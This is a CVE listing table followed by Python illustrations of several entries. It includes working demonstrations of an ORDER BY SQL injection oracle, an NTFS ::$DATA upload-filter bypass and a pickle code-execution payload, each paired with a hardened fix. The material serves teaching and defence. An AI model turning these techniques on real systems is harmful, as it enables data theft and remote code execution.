Total: 296548 CVE
CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description
---|---|---|---|---|---|---
CVE-2020-16165 | 1 Bladex | 1 Springblade | 2025-06-03 | 7.5 HIGH | 9.8 CRITICAL | The DAO/DTO implementation in SpringBlade through 2.7.1 allows SQL Injection in an ORDER BY clause. This is related to the /api/blade-log/api/list ascs and desc parameters.
CVE-2024-33332 | 1 Bladex | 1 Springblade | 2025-06-03 | N/A | 7.5 HIGH | An issue discovered in SpringBlade 3.7.1 allows attackers to obtain sensitive information via crafted GET request to api/blade-system/tenant.
CVE-2024-43033 | 2 Jpress, Microsoft | 2 Jpress, Windows | 2025-06-03 | N/A | 8.8 HIGH | JPress through 5.1.1 on Windows has an arbitrary file upload vulnerability that could cause arbitrary code execution via ::$DATA to AttachmentController, such as a .jsp::$DATA file to io.jpress.web.commons.controller.AttachmentController#upload. NOTE: this is unrelated to the attack vector for CVE-2024-32358.
CVE-2024-32358 | 1 Jpress | 1 Jpress | 2025-06-03 | N/A | 7.5 HIGH | An issue in Jpress v.5.1.0 allows a remote attacker to execute arbitrary code via a crafted script to the custom plug-in module function, a different vulnerability than CVE-2024-43033.
CVE-2024-51058 | 1 Tcpdf Project | 1 Tcpdf | 2025-06-03 | N/A | 6.2 MEDIUM | Local File Inclusion (LFI) vulnerability has been discovered in TCPDF 6.7.5. This vulnerability enables a user to read arbitrary files from the server's file system through <img> src tag, potentially exposing sensitive information.
CVE-2024-35061 | 1 Nasa | 1 Ait Core | 2025-06-03 | N/A | 7.3 HIGH | NASA AIT-Core v2.5.2 was discovered to use unencrypted channels to exchange data over the network, allowing attackers to execute a man-in-the-middle attack. When chained with CVE-2024-35059, the CVE in subject leads to an unauthenticated, fully remote code execution.
CVE-2024-35060 | 1 Nasa | 1 Ait Core | 2025-06-03 | N/A | 7.5 HIGH | An issue in the YAML Python library of NASA AIT-Core v2.5.2 allows attackers to execute arbitrary commands via supplying a crafted YAML file.
CVE-2024-35059 | 1 Nasa | 1 Ait Core | 2025-06-03 | N/A | 7.5 HIGH | An issue in the Pickle Python library of NASA AIT-Core v2.5.2 allows attackers to execute arbitrary commands.
CVE-2025-4516 | | | 2025-06-03 | N/A | N/A | There is an issue in CPython when using `bytes.decode("unicode_escape", error="ignore\|replace")`. If you are not using the "unicode_escape" encoding or an error handler your usage is not affected. To work-around this issue you may stop using the error= handler and instead wrap the bytes.decode() call in a try-except catching the DecodeError.
CVE-2024-23178 | 1 Mediawiki | 1 Mediawiki | 2025-06-03 | N/A | 5.4 MEDIUM | An issue was discovered in the Phonos extension in MediaWiki before 1.40.2. PhonosButton.js allows i18n-based XSS via the phonos-purge-needed-error message.
CVE-2024-23177 | 1 Mediawiki | 1 Mediawiki | 2025-06-03 | N/A | 6.1 MEDIUM | An issue was discovered in the WatchAnalytics extension in MediaWiki before 1.40.2. XSS can occur via the Special:PageStatistics page parameter.
CVE-2024-23173 | 1 Mediawiki | 1 Mediawiki | 2025-06-03 | N/A | 6.1 MEDIUM | An issue was discovered in the Cargo extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:Drilldown page allows XSS via artist, album, and position parameters because of applied filter values in drilldown/CargoAppliedFilter.php.
CVE-2024-22494 | 1 Jfinalcms Project | 1 Jfinalcms | 2025-06-03 | N/A | 5.4 MEDIUM | A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save mobile parameter, which allows remote attackers to inject arbitrary web script or HTML.
CVE-2024-22492 | 1 Jfinalcms Project | 1 Jfinalcms | 2025-06-03 | N/A | 5.4 MEDIUM | A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save contact parameter, which allows remote attackers to inject arbitrary web script or HTML.
CVE-2024-22028 | 1 3rrr-btob | 12 3r-tmc01, 3r-tmc01 Firmware, 3r-tmc02 and 9 more | 2025-06-03 | N/A | 4.6 MEDIUM | Insufficient technical documentation issue exists in thermal camera TMC series all firmware versions. The user of the affected product is not aware of the internally saved data. By accessing the affected product physically, an attacker may retrieve the internal data.
CVE-2024-0230 | 1 Apple | 2 Magic Keyboard, Magic Keyboard Firmware | 2025-06-03 | N/A | 2.4 LOW | A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic.
CVE-2023-7071 | 1 Wpdeveloper | 1 Essential Blocks | 2025-06-03 | N/A | 6.4 MEDIUM | The Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table of Contents block in all versions up to, and including, 4.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVE-2023-7048 | 1 Premio | 1 My Sticky Bar | 2025-06-03 | N/A | 3.1 LOW | The My Sticky Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.6. This is due to missing or incorrect nonce validation in mystickymenu-contact-leads.php. This makes it possible for unauthenticated attackers to trigger the export of a CSV file containing contact leads via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Because the CSV file is exported to a public location, it can be downloaded during a very short window of time before it is automatically deleted by the export function.
CVE-2023-7019 | 1 Themeisle | 1 Lightstart | 2025-06-03 | N/A | 4.3 MEDIUM | The LightStart – Maintenance Mode, Coming Soon and Landing Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the insert_template function in all versions up to, and including, 2.6.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to change page designs.
CVE-2023-6988 | 1 Extendthemes | 1 Colibri Page Builder | 2025-06-03 | N/A | 6.4 MEDIUM | The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's extend_builder_render_js shortcode in all versions up to, and including, 1.0.239 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
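The ORDER BY injection class described for CVE-2020-16165 (sort column and direction taken from request parameters) is worth seeing in working code, because the usual fix for SQL injection, bound parameters, does not apply: identifiers and keywords cannot be bound, so the sort input has to be allowlisted. The following is an added illustration in Python against an in-memory SQLite database; it is not SpringBlade's code and does not reproduce that product's endpoint. The tables `api_log` and `secret`, the helper names and the sample rows are constructed for the example.

```python
import sqlite3

# Constructed sample data: the table an endpoint is meant to sort, plus a
# second table whose contents the query never exposes directly.
_SCHEMA = """
CREATE TABLE api_log (id INTEGER PRIMARY KEY, path TEXT);
INSERT INTO api_log VALUES (1, '/api/zeta'), (2, '/api/alpha'), (3, '/api/mid');
CREATE TABLE secret (token TEXT);
INSERT INTO secret VALUES ('k9-secret');
"""


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(_SCHEMA)
    return conn


def list_vulnerable(sort_col, sort_dir):
    """Sort column and direction are concatenated into the SQL text.
    Placeholders cannot help here: ORDER BY takes identifiers, not values."""
    sql = f"SELECT id FROM api_log ORDER BY {sort_col} {sort_dir}"
    conn = _connect()
    try:
        return [row[0] for row in conn.execute(sql)]
    finally:
        conn.close()


def oracle_payload(guess):
    """Attacker-supplied 'column': a CASE expression whose sort key depends on a
    subquery, so the order of the returned rows leaks one boolean."""
    return (f"(CASE WHEN (SELECT substr(token,1,1) FROM secret)='{guess}' "
            "THEN id ELSE path END)")


def leak_first_char(alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """General form of the attack: compare each guess against the ordering
    produced by a known sort key and keep the guess that matches."""
    baseline = list_vulnerable("id", "ASC")
    for ch in alphabet:
        if list_vulnerable(oracle_payload(ch), "ASC") == baseline:
            return ch
    return None


# Hardened variant: user input selects from a fixed set of identifiers and
# never reaches the SQL text itself.
ALLOWED_COLS = {"id", "path"}
ALLOWED_DIRS = {"asc", "desc"}


def list_hardened(sort_col, sort_dir):
    if sort_col not in ALLOWED_COLS or sort_dir.lower() not in ALLOWED_DIRS:
        raise ValueError("unsupported sort parameter")
    sql = f"SELECT id FROM api_log ORDER BY {sort_col} {sort_dir.upper()}"
    conn = _connect()
    try:
        return [row[0] for row in conn.execute(sql)]
    finally:
        conn.close()
```

With the sample rows, sorting by `id` returns 1, 2, 3 and sorting by `path` returns 2, 3, 1, so the attacker can tell which branch of the CASE was taken from the response alone. The hardened function rejects anything outside the allowlist before building the statement.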
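The `::$DATA` vector in CVE-2024-43033 relies on NTFS alternate data stream syntax: a name like `shell.jsp::$DATA` addresses the unnamed data stream of `shell.jsp`, so the file Windows creates has the `.jsp` extension even though a check on the submitted name sees `jsp::$DATA`. The block below is an added Python illustration of that mismatch and of a stricter filename policy; it is not JPress code and does not model its AttachmentController. The NTFS behaviour is simulated in `ntfs_effective_name` (the real normalisation is done by the filesystem), and the extension lists and helper names are assumptions for the example.

```python
import secrets

# A denylist of "dangerous" extensions, the kind of check that the ADS suffix
# slips past because the suffix changes what the check sees.
DANGEROUS = {"jsp", "jspx", "php", "exe"}


def naive_denylist_allows(filename):
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in DANGEROUS


def ntfs_effective_name(filename):
    """Simulates what Win32/NTFS actually creates for a submitted name:
    'x::$DATA' is the unnamed stream of 'x', and trailing dots and spaces are
    stripped by path normalisation. Simulation only, not a filesystem call."""
    return filename.split(":", 1)[0].rstrip(". ")


def simulate_naive_upload(filename):
    """Name that ends up on disk when only the denylist check is applied,
    or None if the check rejected the upload."""
    if not naive_denylist_allows(filename):
        return None
    return ntfs_effective_name(filename)


# Hardened policy: strip any path, refuse stream/drive syntax outright,
# allowlist the extension, and never reuse the client-supplied name.
ALLOWED = {"png", "jpg", "jpeg", "gif", "pdf"}
FORBIDDEN_CHARS = set('<>"|?*')


def hardened_accept(filename):
    """Returns a server-generated storage name, or None to reject."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not base or base in {".", ".."}:
        return None
    if ":" in base:                       # ADS or drive-letter syntax
        return None
    if any(c in FORBIDDEN_CHARS or ord(c) < 32 for c in base):
        return None
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:                # also rejects "jsp.", "jsp " etc.
        return None
    return secrets.token_hex(8) + "." + ext
```

The generated name removes the client's influence over what is written entirely; the extension check then only has to decide whether the declared type is acceptable.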
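CVE-2024-35059 names Python's pickle module as the source of command execution. The mechanism is general to pickle rather than specific to AIT-Core: unpickling may call any importable callable named in the stream, so `pickle.loads` on attacker-controlled bytes is code execution by design. The added example below is not AIT-Core code; it builds a constructed payload that invokes `subprocess.check_output`, shows the standard-library mitigation the pickle documentation recommends (a `pickle.Unpickler` subclass whose `find_class` only resolves an allowlist), and uses a made-up telemetry dictionary as the benign message.

```python
import io
import pickle
import subprocess
import sys


def build_payload():
    """Constructed attacker payload. __reduce__ tells the unpickler to call
    subprocess.check_output with attacker-chosen arguments; the class itself
    is never referenced in the stream, only the callable and its arguments."""
    class Exploit:
        def __reduce__(self):
            return (subprocess.check_output,
                    ([sys.executable, "-c", "print('pwned')"],))
    return pickle.dumps(Exploit())


def benign_message():
    """Constructed example of the kind of plain data a service would expect."""
    return pickle.dumps({"packet": "telemetry", "values": [1, 2.5, -3]})


def unsafe_loads(data):
    """The pattern the advisory describes: trust whatever the bytes say."""
    return pickle.loads(data)


# Only these globals may be resolved while unpickling. Plain dict/list/str/
# number payloads need no globals at all, so an empty set is a valid policy
# when the wire format is that simple.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not permitted")


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

`unsafe_loads(build_payload())` runs the child process and returns its output; `restricted_loads` on the same bytes fails at `find_class` before any callable is invoked, while the telemetry dictionary round-trips unchanged. A restricted unpickler limits which globals resolve but is still a large attack surface; for untrusted input a schema-checked format such as JSON is the better choice.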
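The CVE-2025-4516 entry gives a concrete work-around: drop the error handler on `unicode_escape` decoding and catch the decode exception instead. The two functions below, added here and not taken from CPython or from any project, show the affected call shape beside the recommended one. In current Python the keyword is `errors=` and the exception raised is `UnicodeDecodeError` (a subclass of `UnicodeError`); the sample inputs are constructed.

```python
def decode_with_handler(data):
    """Call shape the advisory describes as affected: unicode_escape combined
    with an error handler. Kept only for comparison."""
    return data.decode("unicode_escape", errors="ignore")


def decode_with_try_except(data, fallback=None):
    """Advisory work-around: no error handler, so the codec raises on malformed
    escapes and the caller decides what to do. The fallback is an assumption of
    this example; a real caller might log and drop the record instead."""
    try:
        return data.decode("unicode_escape")
    except UnicodeDecodeError:
        return fallback


def decode_records(lines):
    """Applies the work-around to a batch of escaped byte strings (constructed
    input), keeping the good ones and counting the rejected ones."""
    decoded, rejected = [], 0
    for raw in lines:
        text = decode_with_try_except(raw)
        if text is None:
            rejected += 1
        else:
            decoded.append(text)
    return decoded, rejected
```

For well-formed input both functions return the same string; the difference is only in how malformed escapes such as a truncated `\x` sequence are handled.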